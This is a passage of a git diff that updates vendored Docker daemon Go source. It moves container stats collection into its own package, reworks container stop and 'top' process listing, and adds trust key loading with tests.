prefixOrName string, c // If the container is either not running or restarting and requires no stream, return an empty stats. if (!container.IsRunning() || container.IsRestarting()) && !config.Stream { - return json.NewEncoder(config.OutStream).Encode(&types.Stats{}) + return json.NewEncoder(config.OutStream).Encode(&types.StatsJSON{ + Name: container.Name, + ID: container.ID}) } outStream := config.OutStream @@ -133,11 +130,11 @@ func (daemon *Daemon) ContainerStats(ctx context.Context, prefixOrName string, c } func (daemon *Daemon) subscribeToContainerStats(c *container.Container) chan interface{} { - return daemon.statsCollector.collect(c) + return daemon.statsCollector.Collect(c) } func (daemon *Daemon) unsubscribeToContainerStats(c *container.Container, ch chan interface{}) { - daemon.statsCollector.unsubscribe(c, ch) + daemon.statsCollector.Unsubscribe(c, ch) } // GetContainerStats collects all the stats published by a container diff --git a/vendor/github.com/docker/docker/daemon/stats/collector.go b/vendor/github.com/docker/docker/daemon/stats/collector.go new file mode 100644 index 0000000000..88e20984bc --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/stats/collector.go @@ -0,0 +1,159 @@ +package stats // import "github.com/docker/docker/daemon/stats" + +import ( + "bufio" + "sync" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/pubsub" + "github.com/sirupsen/logrus" +) + +// Collector manages and provides container resource stats +type Collector struct { + m sync.Mutex + supervisor supervisor + interval time.Duration + publishers map[*container.Container]*pubsub.Publisher + bufReader *bufio.Reader + + // The following fields are not set on Windows currently. + clockTicksPerSecond uint64 +} + +// NewCollector creates a stats collector that will poll the supervisor with the specified interval +func NewCollector(supervisor supervisor, interval time.Duration) *Collector { + s := &Collector{ + interval: interval, + supervisor: supervisor, + publishers: make(map[*container.Container]*pubsub.Publisher), + bufReader: bufio.NewReaderSize(nil, 128), + } + + platformNewStatsCollector(s) + + return s +} + +type supervisor interface { + // GetContainerStats collects all the stats related to a container + GetContainerStats(container *container.Container) (*types.StatsJSON, error) +} + +// Collect registers the container with the collector and adds it to +// the event loop for collection on the specified interval returning +// a channel for the subscriber to receive on. +func (s *Collector) Collect(c *container.Container) chan interface{} { + s.m.Lock() + defer s.m.Unlock() + publisher, exists := s.publishers[c] + if !exists { + publisher = pubsub.NewPublisher(100*time.Millisecond, 1024) + s.publishers[c] = publisher + } + return publisher.Subscribe() +} + +// StopCollection closes the channels for all subscribers and removes +// the container from metrics collection. +func (s *Collector) StopCollection(c *container.Container) { + s.m.Lock() + if publisher, exists := s.publishers[c]; exists { + publisher.Close() + delete(s.publishers, c) + } + s.m.Unlock() +} + +// Unsubscribe removes a specific subscriber from receiving updates for a container's stats. +func (s *Collector) Unsubscribe(c *container.Container, ch chan interface{}) { + s.m.Lock() + publisher := s.publishers[c] + if publisher != nil { + publisher.Evict(ch) + if publisher.Len() == 0 { + delete(s.publishers, c) + } + } + s.m.Unlock() +} + +// Run starts the collectors and will indefinitely collect stats from the supervisor +func (s *Collector) Run() { + type publishersPair struct { + container *container.Container + publisher *pubsub.Publisher + } + // we cannot determine the capacity here. + // it will grow enough in first iteration + var pairs []publishersPair + + for { + // Put sleep at the start so that it will always be hit, + // preventing a tight loop if no stats are collected. + time.Sleep(s.interval) + + // it does not make sense in the first iteration, + // but saves allocations in further iterations + pairs = pairs[:0] + + s.m.Lock() + for container, publisher := range s.publishers { + // copy pointers here to release the lock ASAP + pairs = append(pairs, publishersPair{container, publisher}) + } + s.m.Unlock() + if len(pairs) == 0 { + continue + } + + onlineCPUs, err := s.getNumberOnlineCPUs() + if err != nil { + logrus.Errorf("collecting system online cpu count: %v", err) + continue + } + + for _, pair := range pairs { + stats, err := s.supervisor.GetContainerStats(pair.container) + + switch err.(type) { + case nil: + // Sample system CPU usage close to container usage to avoid + // noise in metric calculations. + systemUsage, err := s.getSystemCPUUsage() + if err != nil { + logrus.WithError(err).WithField("container_id", pair.container.ID).Errorf("collecting system cpu usage") + continue + } + + // FIXME: move to containerd on Linux (not Windows) + stats.CPUStats.SystemUsage = systemUsage + stats.CPUStats.OnlineCPUs = onlineCPUs + + pair.publisher.Publish(*stats) + + case notRunningErr, notFoundErr: + // publish empty stats containing only name and ID if not running or not found + pair.publisher.Publish(types.StatsJSON{ + Name: pair.container.Name, + ID: pair.container.ID, + }) + + default: + logrus.Errorf("collecting stats for %s: %v", pair.container.ID, err) + } + } + } +} + +type notRunningErr interface { + error + Conflict() +} + +type notFoundErr interface { + error + NotFound() +} diff --git a/vendor/github.com/docker/docker/daemon/stats_collector_unix.go b/vendor/github.com/docker/docker/daemon/stats/collector_unix.go similarity index 69% rename from vendor/github.com/docker/docker/daemon/stats_collector_unix.go rename to vendor/github.com/docker/docker/daemon/stats/collector_unix.go index 0fcc9c5828..2480aceb51 100644 --- a/vendor/github.com/docker/docker/daemon/stats_collector_unix.go +++ b/vendor/github.com/docker/docker/daemon/stats/collector_unix.go @@ -1,6 +1,6 @@ -// +build !windows,!solaris +// +build !windows -package daemon +package stats // import "github.com/docker/docker/daemon/stats" import ( "fmt" @@ -8,18 +8,18 @@ import ( "strconv" "strings" - sysinfo "github.com/docker/docker/pkg/system" "github.com/opencontainers/runc/libcontainer/system" ) +/* +#include +*/ +import "C" + // platformNewStatsCollector performs platform specific initialisation of the -// statsCollector structure. -func platformNewStatsCollector(s *statsCollector) { +// Collector structure. +func platformNewStatsCollector(s *Collector) { s.clockTicksPerSecond = uint64(system.GetClockTicks()) - meminfo, err := sysinfo.ReadMemInfo() - if err == nil && meminfo.MemTotal > 0 { - s.machineMemory = uint64(meminfo.MemTotal) - } } const nanoSecondsPerSecond = 1e9 @@ -32,7 +32,7 @@ const nanoSecondsPerSecond = 1e9 // statistics line and then sums up the first seven fields // provided. See `man 5 proc` for details on specific field // information. -func (s *statsCollector) getSystemCPUUsage() (uint64, error) { +func (s *Collector) getSystemCPUUsage() (uint64, error) { var line string f, err := os.Open("/proc/stat") if err != nil { @@ -69,3 +69,15 @@ func (s *statsCollector) getSystemCPUUsage() (uint64, error) { } return 0, fmt.Errorf("invalid stat format. Error trying to parse the '/proc/stat' file") } + +func (s *Collector) getNumberOnlineCPUs() (uint32, error) { + i, err := C.sysconf(C._SC_NPROCESSORS_ONLN) + // According to POSIX - errno is undefined after successful + // sysconf, and can be non-zero in several cases, so look for + // error in returned value not in errno. + // (https://sourceware.org/bugzilla/show_bug.cgi?id=21536) + if i == -1 { + return 0, err + } + return uint32(i), nil +} diff --git a/vendor/github.com/docker/docker/daemon/stats/collector_windows.go b/vendor/github.com/docker/docker/daemon/stats/collector_windows.go new file mode 100644 index 0000000000..018e9065f1 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/stats/collector_windows.go @@ -0,0 +1,17 @@ +package stats // import "github.com/docker/docker/daemon/stats" + +// platformNewStatsCollector performs platform specific initialisation of the +// Collector structure. This is a no-op on Windows. +func platformNewStatsCollector(s *Collector) { +} + +// getSystemCPUUsage returns the host system's cpu usage in +// nanoseconds. An error is returned if the format of the underlying +// file does not match. This is a no-op on Windows. +func (s *Collector) getSystemCPUUsage() (uint64, error) { + return 0, nil +} + +func (s *Collector) getNumberOnlineCPUs() (uint32, error) { + return 0, nil +} diff --git a/vendor/github.com/docker/docker/daemon/stats_collector.go b/vendor/github.com/docker/docker/daemon/stats_collector.go index dc6825e705..0490b2ea15 100644 --- a/vendor/github.com/docker/docker/daemon/stats_collector.go +++ b/vendor/github.com/docker/docker/daemon/stats_collector.go @@ -1,132 +1,26 @@ -// +build !solaris - -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "bufio" - "sync" + "runtime" "time" - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/types" - "github.com/docker/docker/container" - "github.com/docker/docker/pkg/pubsub" + "github.com/docker/docker/daemon/stats" + "github.com/docker/docker/pkg/system" ) -type statsSupervisor interface { - // GetContainerStats collects all the stats related to a container - GetContainerStats(container *container.Container) (*types.StatsJSON, error) -} - // newStatsCollector returns a new statsCollector that collections // stats for a registered container at the specified interval. // The collector allows non-running containers to be added // and will start processing stats when they are started. -func (daemon *Daemon) newStatsCollector(interval time.Duration) *statsCollector { - s := &statsCollector{ - interval: interval, - supervisor: daemon, - publishers: make(map[*container.Container]*pubsub.Publisher), - bufReader: bufio.NewReaderSize(nil, 128), - } - platformNewStatsCollector(s) - go s.run() - return s -} - -// statsCollector manages and provides container resource stats -type statsCollector struct { - m sync.Mutex - supervisor statsSupervisor - interval time.Duration - publishers map[*container.Container]*pubsub.Publisher - bufReader *bufio.Reader - - // The following fields are not set on Windows currently. - clockTicksPerSecond uint64 - machineMemory uint64 -} - -// collect registers the container with the collector and adds it to -// the event loop for collection on the specified interval returning -// a channel for the subscriber to receive on. -func (s *statsCollector) collect(c *container.Container) chan interface{} { - s.m.Lock() - defer s.m.Unlock() - publisher, exists := s.publishers[c] - if !exists { - publisher = pubsub.NewPublisher(100*time.Millisecond, 1024) - s.publishers[c] = publisher - } - return publisher.Subscribe() -} - -// stopCollection closes the channels for all subscribers and removes -// the container from metrics collection. -func (s *statsCollector) stopCollection(c *container.Container) { - s.m.Lock() - if publisher, exists := s.publishers[c]; exists { - publisher.Close() - delete(s.publishers, c) - } - s.m.Unlock() -} - -// unsubscribe removes a specific subscriber from receiving updates for a container's stats. -func (s *statsCollector) unsubscribe(c *container.Container, ch chan interface{}) { - s.m.Lock() - publisher := s.publishers[c] - if publisher != nil { - publisher.Evict(ch) - if publisher.Len() == 0 { - delete(s.publishers, c) - } - } - s.m.Unlock() -} - -func (s *statsCollector) run() { - type publishersPair struct { - container *container.Container - publisher *pubsub.Publisher - } - // we cannot determine the capacity here. - // it will grow enough in first iteration - var pairs []publishersPair - - for range time.Tick(s.interval) { - // it does not make sense in the first iteration, - // but saves allocations in further iterations - pairs = pairs[:0] - - s.m.Lock() - for container, publisher := range s.publishers { - // copy pointers here to release the lock ASAP - pairs = append(pairs, publishersPair{container, publisher}) - } - s.m.Unlock() - if len(pairs) == 0 { - continue - } - - systemUsage, err := s.getSystemCPUUsage() - if err != nil { - logrus.Errorf("collecting system cpu usage: %v", err) - continue - } - - for _, pair := range pairs { - stats, err := s.supervisor.GetContainerStats(pair.container) - if err != nil { - if _, ok := err.(errNotRunning); !ok { - logrus.Errorf("collecting stats for %s: %v", pair.container.ID, err) - } - continue - } - // FIXME: move to containerd on Linux (not Windows) - stats.CPUStats.SystemUsage = systemUsage - - pair.publisher.Publish(*stats) +func (daemon *Daemon) newStatsCollector(interval time.Duration) *stats.Collector { + // FIXME(vdemeester) move this elsewhere + if runtime.GOOS == "linux" { + meminfo, err := system.ReadMemInfo() + if err == nil && meminfo.MemTotal > 0 { + daemon.machineMemory = uint64(meminfo.MemTotal) } } + s := stats.NewCollector(daemon, interval) + go s.Run() + return s } diff --git a/vendor/github.com/docker/docker/daemon/stats_collector_solaris.go b/vendor/github.com/docker/docker/daemon/stats_collector_solaris.go deleted file mode 100644 index 9cf9f0a94e..0000000000 --- a/vendor/github.com/docker/docker/daemon/stats_collector_solaris.go +++ /dev/null @@ -1,34 +0,0 @@ -package daemon - -import ( - "github.com/docker/docker/container" - "time" -) - -// newStatsCollector returns a new statsCollector for collection stats -// for a registered container at the specified interval. The collector allows -// non-running containers to be added and will start processing stats when -// they are started. -func (daemon *Daemon) newStatsCollector(interval time.Duration) *statsCollector { - return &statsCollector{} -} - -// statsCollector manages and provides container resource stats -type statsCollector struct { -} - -// collect registers the container with the collector and adds it to -// the event loop for collection on the specified interval returning -// a channel for the subscriber to receive on. -func (s *statsCollector) collect(c *container.Container) chan interface{} { - return nil -} - -// stopCollection closes the channels for all subscribers and removes -// the container from metrics collection. -func (s *statsCollector) stopCollection(c *container.Container) { -} - -// unsubscribe removes a specific subscriber from receiving updates for a container's stats. -func (s *statsCollector) unsubscribe(c *container.Container, ch chan interface{}) { -} diff --git a/vendor/github.com/docker/docker/daemon/stats_collector_windows.go b/vendor/github.com/docker/docker/daemon/stats_collector_windows.go deleted file mode 100644 index 41731b9c14..0000000000 --- a/vendor/github.com/docker/docker/daemon/stats_collector_windows.go +++ /dev/null @@ -1,15 +0,0 @@ -// +build windows - -package daemon - -// platformNewStatsCollector performs platform specific initialisation of the -// statsCollector structure. This is a no-op on Windows. -func platformNewStatsCollector(s *statsCollector) { -} - -// getSystemCPUUsage returns the host system's cpu usage in -// nanoseconds. An error is returned if the format of the underlying -// file does not match. This is a no-op on Windows. -func (s *statsCollector) getSystemCPUUsage() (uint64, error) { - return 0, nil -} diff --git a/vendor/github.com/docker/docker/daemon/stats_unix.go b/vendor/github.com/docker/docker/daemon/stats_unix.go index d875607b3a..ee78ca688b 100644 --- a/vendor/github.com/docker/docker/daemon/stats_unix.go +++ b/vendor/github.com/docker/docker/daemon/stats_unix.go @@ -1,12 +1,11 @@ // +build !windows -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "fmt" - "github.com/docker/docker/api/types" "github.com/docker/docker/container" + "github.com/pkg/errors" ) // Resolve Network SandboxID in case the container reuse another container's network stack @@ -16,7 +15,7 @@ func (daemon *Daemon) getNetworkSandboxID(c *container.Container) (string, error containerID := curr.HostConfig.NetworkMode.ConnectedContainer() connected, err := daemon.GetContainer(containerID) if err != nil { - return "", fmt.Errorf("Could not get container for %s", containerID) + return "", errors.Wrapf(err, "Could not get container for %s", containerID) } curr = connected } diff --git a/vendor/github.com/docker/docker/daemon/stats_windows.go b/vendor/github.com/docker/docker/daemon/stats_windows.go index f8e6f6f84a..0306332b48 100644 --- a/vendor/github.com/docker/docker/daemon/stats_windows.go +++ b/vendor/github.com/docker/docker/daemon/stats_windows.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "github.com/docker/docker/api/types" diff --git a/vendor/github.com/docker/docker/daemon/stop.go b/vendor/github.com/docker/docker/daemon/stop.go index aa7b3820c8..c3ac09056a 100644 --- a/vendor/github.com/docker/docker/daemon/stop.go +++ b/vendor/github.com/docker/docker/daemon/stop.go @@ -1,58 +1,53 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "fmt" - "net/http" + "context" "time" - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/errors" - "github.com/docker/docker/container" + containerpkg "github.com/docker/docker/container" + "github.com/docker/docker/errdefs" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) -// ContainerStop looks for the given container and terminates it, -// waiting the given number of seconds before forcefully killing the -// container. If a negative number of seconds is given, ContainerStop -// will wait for a graceful termination. An error is returned if the -// container is not found, is already stopped, or if there is a -// problem stopping the container. -func (daemon *Daemon) ContainerStop(name string, seconds *int) error { +// ContainerStop looks for the given container and stops it. +// In case the container fails to stop gracefully within a time duration +// specified by the timeout argument, in seconds, it is forcefully +// terminated (killed). +// +// If the timeout is nil, the container's StopTimeout value is used, if set, +// otherwise the engine default. A negative timeout value can be specified, +// meaning no timeout, i.e. no forceful termination is performed. +func (daemon *Daemon) ContainerStop(name string, timeout *int) error { container, err := daemon.GetContainer(name) if err != nil { return err } if !container.IsRunning() { - err := fmt.Errorf("Container %s is already stopped", name) - return errors.NewErrorWithStatusCode(err, http.StatusNotModified) + return containerNotModifiedError{running: false} } - if seconds == nil { + if timeout == nil { stopTimeout := container.StopTimeout() - seconds = &stopTimeout + timeout = &stopTimeout } - if err := daemon.containerStop(container, *seconds); err != nil { - return fmt.Errorf("Cannot stop container %s: %v", name, err) + if err := daemon.containerStop(container, *timeout); err != nil { + return errdefs.System(errors.Wrapf(err, "cannot stop container: %s", name)) } return nil } -// containerStop halts a container by sending a stop signal, waiting for the given -// duration in seconds, and then calling SIGKILL and waiting for the -// process to exit. If a negative duration is given, Stop will wait -// for the initial signal forever. If the container is not running Stop returns -// immediately. -func (daemon *Daemon) containerStop(container *container.Container, seconds int) error { +// containerStop sends a stop signal, waits, sends a kill signal. +func (daemon *Daemon) containerStop(container *containerpkg.Container, seconds int) error { if !container.IsRunning() { return nil } - daemon.stopHealthchecks(container) - stopSignal := container.StopSignal() // 1. Send a stop signal if err := daemon.killPossiblyDeadProcess(container, stopSignal); err != nil { // While normally we might "return err" here we're not going to // because if we can't stop the container by this point then - // its probably because its already stopped. Meaning, between + // it's probably because it's already stopped. Meaning, between // the time of the IsRunning() call above and now it stopped. // Also, since the err return will be environment specific we can't // look for any particular (common) error that would indicate @@ -60,7 +55,10 @@ func (daemon *Daemon) containerStop(container *container.Container, seconds int) // So, instead we'll give it up to 2 more seconds to complete and if // by that time the container is still running, then the error // we got is probably valid and so we force kill it. - if _, err := container.WaitStop(2 * time.Second); err != nil { + ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second) + defer cancel() + + if status := <-container.Wait(ctx, containerpkg.WaitConditionNotRunning); status.Err() != nil { logrus.Infof("Container failed to stop after sending signal %d to the process, force killing", stopSignal) if err := daemon.killPossiblyDeadProcess(container, 9); err != nil { return err @@ -69,11 +67,19 @@ func (daemon *Daemon) containerStop(container *container.Container, seconds int) } // 2. Wait for the process to exit on its own - if _, err := container.WaitStop(time.Duration(seconds) * time.Second); err != nil { + ctx := context.Background() + if seconds >= 0 { + var cancel context.CancelFunc + ctx, cancel = context.WithTimeout(ctx, time.Duration(seconds)*time.Second) + defer cancel() + } + + if status := <-container.Wait(ctx, containerpkg.WaitConditionNotRunning); status.Err() != nil { logrus.Infof("Container %v failed to exit within %d seconds of signal %d - using the force", container.ID, seconds, stopSignal) // 3. If it doesn't, then send SIGKILL if err := daemon.Kill(container); err != nil { - container.WaitStop(-1 * time.Second) + // Wait without a timeout, ignore result. + <-container.Wait(context.Background(), containerpkg.WaitConditionNotRunning) logrus.Warn(err) // Don't return error because we only care that container is stopped, not what function stopped it } } diff --git a/vendor/github.com/docker/docker/api/fixtures/keyfile b/vendor/github.com/docker/docker/daemon/testdata/keyfile similarity index 100% rename from vendor/github.com/docker/docker/api/fixtures/keyfile rename to vendor/github.com/docker/docker/daemon/testdata/keyfile diff --git a/vendor/github.com/docker/docker/daemon/top_unix.go b/vendor/github.com/docker/docker/daemon/top_unix.go index 7fb81d0148..99ca56f0f4 100644 --- a/vendor/github.com/docker/docker/daemon/top_unix.go +++ b/vendor/github.com/docker/docker/daemon/top_unix.go @@ -1,21 +1,26 @@ //+build !windows -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "bytes" + "context" "fmt" "os/exec" "regexp" "strconv" "strings" - "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/errdefs" + "github.com/pkg/errors" ) func validatePSArgs(psArgs string) error { // NOTE: \\s does not detect unicode whitespaces. // So we use fieldsASCII instead of strings.Fields in parsePSOutput. // See https://github.com/docker/docker/pull/24358 + // nolint: gosimple re := regexp.MustCompile("\\s+([^\\s]*)=\\s*(PID[^\\s]*)") for _, group := range re.FindAllStringSubmatch(psArgs, -1) { if len(group) >= 3 { @@ -41,8 +46,25 @@ func fieldsASCII(s string) []string { return strings.FieldsFunc(s, fn) } -func parsePSOutput(output []byte, pids []int) (*types.ContainerProcessList, error) { - procList := &types.ContainerProcessList{} +func appendProcess2ProcList(procList *container.ContainerTopOKBody, fields []string) { + // Make sure number of fields equals number of header titles + // merging "overhanging" fields + process := fields[:len(procList.Titles)-1] + process = append(process, strings.Join(fields[len(procList.Titles)-1:], " ")) + procList.Processes = append(procList.Processes, process) +} + +func hasPid(procs []uint32, pid int) bool { + for _, p := range procs { + if int(p) == pid { + return true + } + } + return false +} + +func parsePSOutput(output []byte, procs []uint32) (*container.ContainerTopOKBody, error) { + procList := &container.ContainerTopOKBody{} lines := strings.Split(string(output), "\n") procList.Titles = fieldsASCII(lines[0]) @@ -51,6 +73,7 @@ func parsePSOutput(output []byte, pids []int) (*types.ContainerProcessList, erro for i, name := range procList.Titles { if name == "PID" { pidIndex = i + break } } if pidIndex == -1 { @@ -58,35 +81,61 @@ func parsePSOutput(output []byte, pids []int) (*types.ContainerProcessList, erro } // loop through the output and extract the PID from each line + // fixing #30580, be able to display thread line also when "m" option used + // in "docker top" client command + preContainedPidFlag := false for _, line := range lines[1:] { if len(line) == 0 { continue } fields := fieldsASCII(line) - p, err := strconv.Atoi(fields[pidIndex]) + + var ( + p int + err error + ) + + if fields[pidIndex] == "-" { + if preContainedPidFlag { + appendProcess2ProcList(procList, fields) + } + continue + } + p, err = strconv.Atoi(fields[pidIndex]) if err != nil { return nil, fmt.Errorf("Unexpected pid '%s': %s", fields[pidIndex], err) } - for _, pid := range pids { - if pid == p { - // Make sure number of fields equals number of header titles - // merging "overhanging" fields - process := fields[:len(procList.Titles)-1] - process = append(process, strings.Join(fields[len(procList.Titles)-1:], " ")) - procList.Processes = append(procList.Processes, process) - } + if hasPid(procs, p) { + preContainedPidFlag = true + appendProcess2ProcList(procList, fields) + continue } + preContainedPidFlag = false } return procList, nil } +// psPidsArg converts a slice of PIDs to a string consisting +// of comma-separated list of PIDs prepended by "-q". +// For example, psPidsArg([]uint32{1,2,3}) returns "-q1,2,3". +func psPidsArg(pids []uint32) string { + b := []byte{'-', 'q'} + for i, p := range pids { + b = strconv.AppendUint(b, uint64(p), 10) + if i < len(pids)-1 { + b = append(b, ',') + } + } + return string(b) +} + // ContainerTop lists the processes running inside of the given // container by calling ps with the given args, or with the flags // "-ef" if no args are given. An error is returned if the container // is not found, or is not running, or if there are any problems // running ps, or parsing the output. -func (daemon *Daemon) ContainerTop(name string, psArgs string) (*types.ContainerProcessList, error) { +func (daemon *Daemon) ContainerTop(name string, psArgs string) (*container.ContainerTopOKBody, error) { if psArgs == "" { psArgs = "-ef" } @@ -101,23 +150,37 @@ func (daemon *Daemon) ContainerTop(name string, psArgs string) (*types.Container } if !container.IsRunning() { - return nil, errNotRunning{container.ID} + return nil, errNotRunning(container.ID) } if container.IsRestarting() { return nil, errContainerIsRestarting(container.ID) } - pids, err := daemon.containerd.GetPidsForContainer(container.ID) + procs, err := daemon.containerd.ListPids(context.Background(), container.ID) if err != nil { return nil, err } - output, err := exec.Command("ps", strings.Split(psArgs, " ")...).Output() + args := strings.Split(psArgs, " ") + pids := psPidsArg(procs) + output, err := exec.Command("ps", append(args, pids)...).Output() if err != nil { - return nil, fmt.Errorf("Error running ps: %v", err) + // some ps options (such as f) can't be used together with q, + // so retry without it + output, err = exec.Command("ps", args...).Output() + if err != nil { + if ee, ok := err.(*exec.ExitError); ok { + // first line of stderr shows why ps failed + line := bytes.SplitN(ee.Stderr, []byte{'\n'}, 2) + if len(line) > 0 && len(line[0]) > 0 { + err = errors.New(string(line[0])) + } + } + return nil, errdefs.System(errors.Wrap(err, "ps")) + } } - procList, err := parsePSOutput(output, pids) + procList, err := parsePSOutput(output, procs) if err != nil { return nil, err } diff --git a/vendor/github.com/docker/docker/daemon/top_unix_test.go b/vendor/github.com/docker/docker/daemon/top_unix_test.go index 269ab6e947..41cb3e1cd9 100644 --- a/vendor/github.com/docker/docker/daemon/top_unix_test.go +++ b/vendor/github.com/docker/docker/daemon/top_unix_test.go @@ -1,6 +1,6 @@ //+build !windows -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "testing" @@ -36,31 +36,34 @@ func TestContainerTopValidatePSArgs(t *testing.T) { func TestContainerTopParsePSOutput(t *testing.T) { tests := []struct { output []byte - pids []int + pids []uint32 errExpected bool }{ {[]byte(` PID COMMAND 42 foo 43 bar + - - 100 baz -`), []int{42, 43}, false}, +`), []uint32{42, 43}, false}, {[]byte(` UID COMMAND 42 foo 43 bar + - - 100 baz -`), []int{42, 43}, true}, +`), []uint32{42, 43}, true}, // unicode space (U+2003, 0xe2 0x80 0x83) {[]byte(` PID COMMAND 42 foo 43 bar + - - 100 baz -`), []int{42, 43}, true}, +`), []uint32{42, 43}, true}, // the first space is U+2003, the second one is ascii. {[]byte(` PID COMMAND 42 foo 43 bar 100 baz -`), []int{42, 43}, true}, +`), []uint32{42, 43}, true}, } for _, f := range tests { diff --git a/vendor/github.com/docker/docker/daemon/top_windows.go b/vendor/github.com/docker/docker/daemon/top_windows.go index 3dd8ead468..1b3f843962 100644 --- a/vendor/github.com/docker/docker/daemon/top_windows.go +++ b/vendor/github.com/docker/docker/daemon/top_windows.go @@ -1,11 +1,12 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "errors" "fmt" "time" - "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" "github.com/docker/go-units" ) @@ -23,7 +24,7 @@ import ( // task manager does and use the private working set as the memory counter. // We could return more info for those who really understand how memory // management works in Windows if we introduced a "raw" stats (above). -func (daemon *Daemon) ContainerTop(name string, psArgs string) (*types.ContainerProcessList, error) { +func (daemon *Daemon) ContainerTop(name string, psArgs string) (*containertypes.ContainerTopOKBody, error) { // It's not at all an equivalent to linux 'ps' on Windows if psArgs != "" { return nil, errors.New("Windows does not support arguments to top") @@ -34,11 +35,19 @@ func (daemon *Daemon) ContainerTop(name string, psArgs string) (*types.Container return nil, err } - s, err := daemon.containerd.Summary(container.ID) + if !container.IsRunning() { + return nil, errNotRunning(container.ID) + } + + if container.IsRestarting() { + return nil, errContainerIsRestarting(container.ID) + } + + s, err := daemon.containerd.Summary(context.Background(), container.ID) if err != nil { return nil, err } - procList := &types.ContainerProcessList{} + procList := &containertypes.ContainerTopOKBody{} procList.Titles = []string{"Name", "PID", "CPU", "Private Working Set"} for _, j := range s { @@ -49,5 +58,6 @@ func (daemon *Daemon) ContainerTop(name string, psArgs string) (*types.Container fmt.Sprintf("%02d:%02d:%02d.%03d", int(d.Hours()), int(d.Minutes())%60, int(d.Seconds())%60, int(d.Nanoseconds()/1000000)%1000), units.HumanSize(float64(j.MemoryWorkingSetPrivateBytes))}) } + return procList, nil } diff --git a/vendor/github.com/docker/docker/daemon/trustkey.go b/vendor/github.com/docker/docker/daemon/trustkey.go new file mode 100644 index 0000000000..bf00b6a3a0 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/trustkey.go @@ -0,0 +1,57 @@ +package daemon // import "github.com/docker/docker/daemon" + +import ( + "encoding/json" + "encoding/pem" + "fmt" + "os" + "path/filepath" + + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/system" + "github.com/docker/libtrust" +) + +// LoadOrCreateTrustKey attempts to load the libtrust key at the given path, +// otherwise generates a new one +// TODO: this should use more of libtrust.LoadOrCreateTrustKey which may need +// a refactor or this function to be moved into libtrust +func loadOrCreateTrustKey(trustKeyPath string) (libtrust.PrivateKey, error) { + err := system.MkdirAll(filepath.Dir(trustKeyPath), 0700, "") + if err != nil { + return nil, err + } + trustKey, err := libtrust.LoadKeyFile(trustKeyPath) + if err == libtrust.ErrKeyFileDoesNotExist { + trustKey, err = libtrust.GenerateECP256PrivateKey() + if err != nil { + return nil, fmt.Errorf("Error generating key: %s", err) + } + encodedKey, err := serializePrivateKey(trustKey, filepath.Ext(trustKeyPath)) + if err != nil { + return nil, fmt.Errorf("Error serializing key: %s", err) + } + if err := ioutils.AtomicWriteFile(trustKeyPath, encodedKey, os.FileMode(0600)); err != nil { + return nil, fmt.Errorf("Error saving key file: %s", err) + } + } else if err != nil { + return nil, fmt.Errorf("Error loading key file %s: %s", trustKeyPath, err) + } + return trustKey, nil +} + +func serializePrivateKey(key libtrust.PrivateKey, ext string) (encoded []byte, err error) { + if ext == ".json" || ext == ".jwk" { + encoded, err = json.Marshal(key) + if err != nil { + return nil, fmt.Errorf("unable to encode private key JWK: %s", err) + } + } else { + pemBlock, err := key.PEMBlock() + if err != nil { + return nil, fmt.Errorf("unable to encode private key PEM: %s", err) + } + encoded = pem.EncodeToMemory(pemBlock) + } + return +} diff --git a/vendor/github.com/docker/docker/daemon/trustkey_test.go b/vendor/github.com/docker/docker/daemon/trustkey_test.go new file mode 100644 index 0000000000..e49e76aa3e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/trustkey_test.go @@ -0,0 +1,71 @@ +package daemon // import "github.com/docker/docker/daemon" + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/fs" +) + +// LoadOrCreateTrustKey +func TestLoadOrCreateTrustKeyInvalidKeyFile(t *testing.T) { + tmpKeyFolderPath, err := ioutil.TempDir("", "api-trustkey-test") + assert.NilError(t, err) + defer os.RemoveAll(tmpKeyFolderPath) + + tmpKeyFile, err := ioutil.TempFile(tmpKeyFolderPath, "keyfile") + assert.NilError(t, err) + + _, err = loadOrCreateTrustKey(tmpKeyFile.Name()) + assert.Check(t, is.ErrorContains(err, "Error loading key file")) +} + +func TestLoadOrCreateTrustKeyCreateKeyWhenFileDoesNotExist(t *testing.T) { + tmpKeyFolderPath := fs.NewDir(t, "api-trustkey-test") + defer tmpKeyFolderPath.Remove() + + // Without the need to create the folder hierarchy + tmpKeyFile := tmpKeyFolderPath.Join("keyfile") + + key, err := loadOrCreateTrustKey(tmpKeyFile) + assert.NilError(t, err) + assert.Check(t, key != nil) + + _, err = os.Stat(tmpKeyFile) + assert.NilError(t, err, "key file doesn't exist") +} + +func TestLoadOrCreateTrustKeyCreateKeyWhenDirectoryDoesNotExist(t *testing.T) { + tmpKeyFolderPath := fs.NewDir(t, "api-trustkey-test") + defer tmpKeyFolderPath.Remove() + tmpKeyFile := tmpKeyFolderPath.Join("folder/hierarchy/keyfile") + + key, err := loadOrCreateTrustKey(tmpKeyFile) + assert.NilError(t, err) + assert.Check(t, key != nil) + + _, err = os.Stat(tmpKeyFile) + assert.NilError(t, err, "key file doesn't exist") +} + +func TestLoadOrCreateTrustKeyCreateKeyNoPath(t *testing.T) { + defer os.Remove("keyfile") + key, err := loadOrCreateTrustKey("keyfile") + assert.NilError(t, err) + assert.Check(t, key != nil) + + _, err = os.Stat("keyfile") + assert.NilError(t, err, "key file doesn't exist") +} + +func TestLoadOrCreateTrustKeyLoadValidKey(t 